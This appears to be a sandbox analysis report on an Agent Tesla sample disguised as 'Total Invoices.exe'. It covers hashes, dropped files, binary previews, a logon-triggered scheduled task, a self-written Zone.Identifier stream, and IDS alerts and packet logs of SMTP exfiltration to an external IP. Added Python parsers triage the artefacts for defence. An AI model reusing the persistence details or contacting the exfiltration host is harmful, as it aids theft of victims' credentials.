                                                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaExvn:cge1wYrFdOFzOzN33ODOiDdKrsuTbv
                                                                                      MD5:D224075B54516C4FC7B1D8992FBC8059
                                                                                      SHA1:9948150633F38980611B3C4BBC0B3DD1A1820944
                                                                                      SHA-256:0176438C5EE03510501D341B7F5039B7195A2A4EB155C18061308E8FE3F37E10
                                                                                      SHA-512:C12872F6DDD75955A28A14DE61F79D038D069589FAB89D87E1DA499799ECEA8CEAB0359E06FACF41F0253B46A574E93CFF45E0A09BCF07D10F0453EC3F395A51
                                                                                      Malicious:true
                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                      Process:C:\Users\user\AppData\Roaming\dWXyZYb.exe
                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):1573
                                                                                      Entropy (8bit):5.117699305067449
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaExvn:cge1wYrFdOFzOzN33ODOiDdKrsuTbv
                                                                                      MD5:D224075B54516C4FC7B1D8992FBC8059
                                                                                      SHA1:9948150633F38980611B3C4BBC0B3DD1A1820944
                                                                                      SHA-256:0176438C5EE03510501D341B7F5039B7195A2A4EB155C18061308E8FE3F37E10
                                                                                      SHA-512:C12872F6DDD75955A28A14DE61F79D038D069589FAB89D87E1DA499799ECEA8CEAB0359E06FACF41F0253B46A574E93CFF45E0A09BCF07D10F0453EC3F395A51
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
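The two entries above are the same 1,573-byte Task Scheduler XML (identical hashes), dropped first by Total Invoices.exe and again by dWXyZYb.exe. The preview shows the persistence-relevant parts: a LogonTrigger for user-PC\user, a LeastPrivilege principal, and a 2014 registration date inside a sample whose PE timestamp is April 2024. Note also that the file declares encoding="UTF-16" while its detected file type is ASCII text; that mismatch breaks a naive XML parse and is itself a useful indicator. The following is an added Python example, not code from the report or from the sample, that triages such a file. The embedded XML is a constructed input reproducing the visible fields, including the UTF-16 declaration over ASCII bytes; the <Actions> block is not visible in the preview, so the command path in it is a hypothetical placeholder.

```python
"""Triage a dropped Windows Task Scheduler XML file (added example)."""
from __future__ import annotations
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed sample: reproduces the fields visible in the report's preview.
# The <Actions> block is not visible there; the command below is a hypothetical
# placeholder, not a path taken from the report.
SAMPLE_TASK_XML = b'''<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\\user</UserId>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\user\\AppData\\Roaming\\hypothetical\\payload.exe</Command>
    </Exec>
  </Actions>
</Task>
'''

USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def decode_task_xml(raw: bytes) -> tuple[str, str | None, str]:
    """Return (xml_text, declared_encoding, actual_encoding).

    Task Scheduler's own export writes UTF-16 with a BOM. The dropped file declares
    UTF-16 over single-byte ASCII; expat rejects that contradiction, so the
    declaration is stripped and the already-decoded text is parsed instead.
    """
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        actual, text = "utf-16", raw.decode("utf-16")
    else:
        actual = "ascii" if all(b < 0x80 for b in raw) else "utf-8"
        text = raw.decode("utf-8", errors="replace")
    m = re.match(r'\s*<\?xml[^>]*?encoding="([^"]+)"', text)
    declared = m.group(1) if m else None
    text = re.sub(r"^\s*<\?xml[^>]*\?>", "", text, count=1)
    return text, declared, actual


def triage_task(raw: bytes, reference_year: int = 2024) -> dict:
    """Extract persistence-relevant fields plus plain-text findings."""
    text, declared, actual = decode_task_xml(raw)
    root = ET.fromstring(text)

    def txt(path: str) -> str | None:
        node = root.find(path, TASK_NS)
        return node.text.strip() if node is not None and node.text else None

    logon = root.find("t:Triggers/t:LogonTrigger", TASK_NS)
    # A LogonTrigger without an <Enabled> element is enabled by default.
    logon_enabled = logon is not None and (txt("t:Triggers/t:LogonTrigger/t:Enabled") or "true").lower() == "true"
    commands = [c.text.strip() for c in root.findall("t:Actions/t:Exec/t:Command", TASK_NS) if c.text]
    reg_date = txt("t:RegistrationInfo/t:Date")

    findings = []
    if declared and declared.upper().replace("-", "") == "UTF16" and actual != "utf-16":
        findings.append("declares UTF-16 but is single-byte text: not written by Task Scheduler's own export")
    if logon_enabled:
        findings.append("LogonTrigger enabled: runs at every logon of " + (txt("t:Triggers/t:LogonTrigger/t:UserId") or "any user"))
    if reg_date and int(reg_date[:4]) < reference_year - 1:
        findings.append("RegistrationInfo/Date %s predates the reference year: likely a reused template" % reg_date[:10])
    for cmd in commands:
        if any(p in cmd.lower() for p in USER_WRITABLE):
            findings.append("action runs from a user-writable path: " + cmd)

    return {"declared_encoding": declared, "actual_encoding": actual,
            "author": txt("t:RegistrationInfo/t:Author"), "logon_trigger": logon_enabled,
            "run_level": txt("t:Principals/t:Principal/t:RunLevel"),
            "commands": commands, "findings": findings}


if __name__ == "__main__":
    for key, value in triage_task(SAMPLE_TASK_XML).items():
        print(f"{key}: {value}")
```

The reference year is a parameter so the template check can be driven from the sample's own PE timestamp rather than from the analysis date.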
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:modified
                                                                                      Size (bytes):45984
                                                                                      Entropy (8bit):6.16795797263964
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                                                                      MD5:9D352BC46709F0CB5EC974633A0C3C94
                                                                                      SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                                                                      SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                                                                      SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      • Antivirus: Virustotal, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: BARSYL SHIPPING Co (VIETNAM).exe, Detection: malicious
                                                                                      • Filename: BARSYL SHIPPING Co (VIETNAM).exe, Detection: malicious
                                                                                      • Filename: Urgent PO 18-3081 Confirmation.exe, Detection: malicious
                                                                                      • Filename: CAHKHCM2404009CFS.exe, Detection: malicious
                                                                                      • Filename: FAR.N_2430-240009934.exe, Detection: malicious
                                                                                      • Filename: TT copy of the first payment.exe, Detection: malicious
                                                                                      • Filename: Booking_BK24-000288_19_Apr_2410_52_34 AM.exe, Detection: malicious
                                                                                      • Filename: charesworh.exe, Detection: malicious
                                                                                      • Filename: FAR.N_2430-240009934.exe, Detection: malicious
                                                                                      • Filename: FAR.N#U00b02430-24000993.exe, Detection: malicious
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                                                                      Process:C:\Users\user\Desktop\Total Invoices.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):807936
                                                                                      Entropy (8bit):7.87057793921588
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:7ldr5ja9fm5r+jrZf1vsAJ2jN5GFhXuv:7lbjH5srZtvXouj
                                                                                      MD5:CD3C05EBB9A3FCA7AA748F522559B1EA
                                                                                      SHA1:43DC8CDF47186A54DC38CD86450ACA6F6361A9B4
                                                                                      SHA-256:C96565623C3E405A370614F452383A763F5A48BAF25E79F91A6311C9A0A8FD3A
                                                                                      SHA-512:5D11D8DBEC417ED7C8BD9F2B49925C01440B4D517CFF1190D411E832528550F0E6645C7005DBD0953AAFB82BA7D25977351F0AD5ABA5736BD62140A3D0CC2E6A
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 61%
                                                                                      • Antivirus: Virustotal, Detection: 32%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9'f..............0......L.......$... ...@....@.. ....................................@.................................b$..O....@..@H..........................t...T............................................ ............... ..H............text........ ...................... ..`.rsrc...@H...@...J..................@..@.reloc...............R..............@..B.................$......H........>..l=..........L|..(..............................................}......}......}......}.....(.......(.....*..*.0..@.........{....%o.....{....Xo......{....%o ....{....Yo!.....{....%o ....{....Yo!.....{....r...p.|....("...(#...o$.....{....o ... j.......,!..{.... X...o!......{.....X}......{....o .........,!..{.... R...o!......{.....X}......{....o%.......{....o%...(&...-@.{....o%.......{....o%...(&...- .{....o%.......{....o%...(&...+....,...*:..{....o'....*..0..........
                                                                                      Process:C:\Users\user\Desktop\Total Invoices.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):26
                                                                                      Entropy (8bit):3.95006375643621
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                      Malicious:false
                                                                                      Preview:[ZoneTransfer]....ZoneId=0
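The 26-byte file above is a Zone.Identifier alternate data stream written by the sample itself. The preview's dots are the CR/LF bytes, so the full content is "[ZoneTransfer]", a blank line, and "ZoneId=0". ZoneId 0 is URLZONE_LOCAL_MACHINE in urlmon.h, so the file carries no Internet-origin mark: Windows SmartScreen and Office Protected View key off the Internet (3) and Restricted (4) zones and treat this file as local. A stream that names a local zone and carries no ReferrerUrl/HostUrl is what a program writes for itself, not what a browser writes for a download. The following is an added Python example, not code from the report or from the sample: a parser for the stream, run over the self-written content reconstructed from the preview and over a constructed browser-style download stream (hypothetical URLs) for contrast.

```python
"""Parse and assess an NTFS Zone.Identifier stream (Mark-of-the-Web); added example."""
from __future__ import annotations

# URLZONE values from urlmon.h
ZONE_NAMES = {
    0: "Local Machine",
    1: "Local Intranet",
    2: "Trusted Sites",
    3: "Internet",
    4: "Restricted Sites",
}

# Constructed input 1: the 26-byte content shown in the report preview,
# "[ZoneTransfer]....ZoneId=0", with each dot replaced by the CR/LF byte it stands for.
SELF_WRITTEN = b"[ZoneTransfer]\r\n\r\nZoneId=0"

# Constructed input 2: what a browser writes for an Internet download
# (hypothetical URLs, used only for contrast).
BROWSER_DOWNLOAD = (
    b"[ZoneTransfer]\r\n"
    b"ZoneId=3\r\n"
    b"ReferrerUrl=https://example.invalid/\r\n"
    b"HostUrl=https://example.invalid/Total%20Invoices.exe\r\n"
)


def parse_zone_identifier(raw: bytes) -> dict[str, str]:
    """Return key/value pairs of the [ZoneTransfer] section (keys keep their case).

    The stream is INI-like; blank lines and unknown sections are ignored, and a
    malformed stream yields an empty mapping rather than an exception.
    """
    fields: dict[str, str] = {}
    in_section = False
    for line in raw.decode("utf-8", errors="replace").splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[zonetransfer]"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def assess_motw(raw: bytes | None) -> dict:
    """Classify a file's provenance from its Zone.Identifier stream (None = no stream)."""
    fields = parse_zone_identifier(raw) if raw is not None else {}
    zone_raw = fields.get("ZoneId", "")
    zone_id = int(zone_raw) if zone_raw.isdigit() else None
    internet_origin = zone_id in (3, 4)
    has_urls = any(k in fields for k in ("HostUrl", "ReferrerUrl"))

    if raw is None:
        verdict = "no Zone.Identifier stream: file never received a mark of the web"
    elif zone_id is None:
        verdict = "stream present but ZoneId missing or malformed"
    elif internet_origin:
        verdict = f"ZoneId={zone_id} ({ZONE_NAMES[zone_id]}): SmartScreen/Protected View apply"
    else:
        verdict = (f"ZoneId={zone_id} ({ZONE_NAMES.get(zone_id, 'unknown')}): treated as local; "
                   "a local zone with no source URLs is typically written by the file's "
                   "creator, not by a browser")
    return {
        "zone_id": zone_id,
        "zone": ZONE_NAMES.get(zone_id, "unknown") if zone_id is not None else None,
        "internet_origin": internet_origin,
        "has_source_urls": has_urls,
        "verdict": verdict,
    }


if __name__ == "__main__":
    print(len(SELF_WRITTEN), "bytes:", assess_motw(SELF_WRITTEN)["verdict"])
    print(assess_motw(BROWSER_DOWNLOAD)["verdict"])
```

On a live host the stream is read with the `:Zone.Identifier` suffix on the path (or `Get-Content -Stream Zone.Identifier` in PowerShell); the parser above is deliberately lenient because the stream is written by many different programs and is not always well-formed.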
                                                                                      Process:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1141
                                                                                      Entropy (8bit):4.442398121585593
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
                                                                                      MD5:6FB4D27A716A8851BC0505666E7C7A10
                                                                                      SHA1:AD2A232C6E709223532C4D1AB892303273D8C814
                                                                                      SHA-256:1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
                                                                                      SHA-512:3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
                                                                                      Malicious:false
                                                                                      Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c
                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):7.87057793921588
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                      File name:Total Invoices.exe
                                                                                      File size:807'936 bytes
                                                                                      MD5:cd3c05ebb9a3fca7aa748f522559b1ea
                                                                                      SHA1:43dc8cdf47186a54dc38cd86450aca6f6361a9b4
                                                                                      SHA256:c96565623c3e405a370614f452383a763f5a48baf25e79f91a6311c9a0a8fd3a
                                                                                      SHA512:5d11d8dbec417ed7c8bd9f2b49925c01440b4d517cff1190d411e832528550f0e6645c7005dbd0953aafb82ba7d25977351f0ad5aba5736bd62140a3d0cc2e6a
                                                                                      SSDEEP:24576:7ldr5ja9fm5r+jrZf1vsAJ2jN5GFhXuv:7lbjH5srZtvXouj
                                                                                      TLSH:9905235F67E29313CAB5837AE086136203F6E189731293624FF2D6A54F12B45AF231D7
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9'f..............0......L.......$... ...@....@.. ....................................@................................
Icon Hash: d4d4d8da9a8e828a
Entrypoint: 0x4a24b6
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x6627390E [Tue Apr 23 04:29:02 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
dec edx
inc ecx
xor dh, byte ptr [41303547h]
inc edx
inc ecx
xor al, 47h
add byte ptr [eax], al
add byte ptr [eax], al
inc ebp
aaa
inc esi
cmp byte ptr [eax], bh
push edx
aaa
dec eax
inc edi
cmp byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa2462 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa4000 | 0x24840 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xca000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa0b74 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa04dc | 0xa0600 | 6bed1261e3bcd334b7d1a64848795808 | False | 0.9774652304169914 | OpenPGP Secret Key | 7.983017215615163 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xa4000 | 0x24840 | 0x24a00 | 43a073bb7418d1841c43f729fee2f047 | False | 0.611528103668942 | data | 6.894861680909162 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xca000 | 0xc | 0x200 | b35e2cd8154a63efdbb1cdc319c41c71 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xa41f0 | 0xfe14 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9993235348379559
RT_ICON | 0xb4004 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | | | 0.32948361528451436
RT_ICON | 0xc482c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.19398340248962656
RT_ICON | 0xc6dd4 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.27603189493433394
RT_ICON | 0xc7e7c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.38120567375886527
RT_GROUP_ICON | 0xc82e4 | 0x4c | data | | | 0.75
RT_VERSION | 0xc8330 | 0x324 | data | | | 0.44029850746268656
RT_MANIFEST | 0xc8654 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/24/24-03:17:06.326829 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49735 | 587 | 192.168.2.4 | 192.185.129.60
04/24/24-03:17:14.975638 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49736 | 587 | 192.168.2.4 | 192.185.129.60
04/24/24-03:17:06.326829 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49735 | 587 | 192.168.2.4 | 192.185.129.60
04/24/24-03:17:14.975638 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49736 | 587 | 192.168.2.4 | 192.185.129.60
04/24/24-03:17:06.326860 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49735 | 587 | 192.168.2.4 | 192.185.129.60
04/24/24-03:17:06.326860 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49735 | 587 | 192.168.2.4 | 192.185.129.60
04/24/24-03:17:06.326860 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49735 | 587 | 192.168.2.4 | 192.185.129.60
04/24/24-03:17:14.975638 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49736 | 587 | 192.168.2.4 | 192.185.129.60
04/24/24-03:17:14.975638 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49736 | 587 | 192.168.2.4 | 192.185.129.60
04/24/24-03:17:06.326860 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49735 | 587 | 192.168.2.4 | 192.185.129.60
04/24/24-03:17:14.975638 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49736 | 587 | 192.168.2.4 | 192.185.129.60
04/24/24-03:17:14.975638 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49736 | 587 | 192.168.2.4 | 192.185.129.60
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 24, 2024 03:17:04.505109072 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:04.686703920 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:04.686803102 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:05.000096083 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:05.001365900 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:05.183100939 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:05.183913946 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:05.378051996 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:05.379401922 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:05.606767893 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:05.663089037 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:05.663299084 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:05.846235991 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:05.846681118 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:05.847342014 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:06.080075026 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:06.144768000 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:06.144891024 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:06.326119900 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:06.326395035 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:06.326828957 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:06.326859951 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:06.326879025 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:06.326885939 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:06.508342981 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:06.510248899 CEST | 587 | 49735 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:06.617182970 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:13.125122070 CEST | 49735 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:13.349605083 CEST | 49736 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:13.530528069 CEST | 587 | 49736 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:13.530729055 CEST | 49736 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:13.774615049 CEST | 587 | 49736 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:13.774859905 CEST | 49736 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:13.956281900 CEST | 587 | 49736 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:13.956635952 CEST | 49736 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:14.139702082 CEST | 587 | 49736 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:14.139931917 CEST | 49736 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:14.334096909 CEST | 587 | 49736 | 192.185.129.60 | 192.168.2.4
Apr 24, 2024 03:17:14.334405899 CEST | 49736 | 587 | 192.168.2.4 | 192.185.129.60
Apr 24, 2024 03:17:14.516678095 CEST | 587 | 49736 | 192.185.129.60 | 192.168.2.4
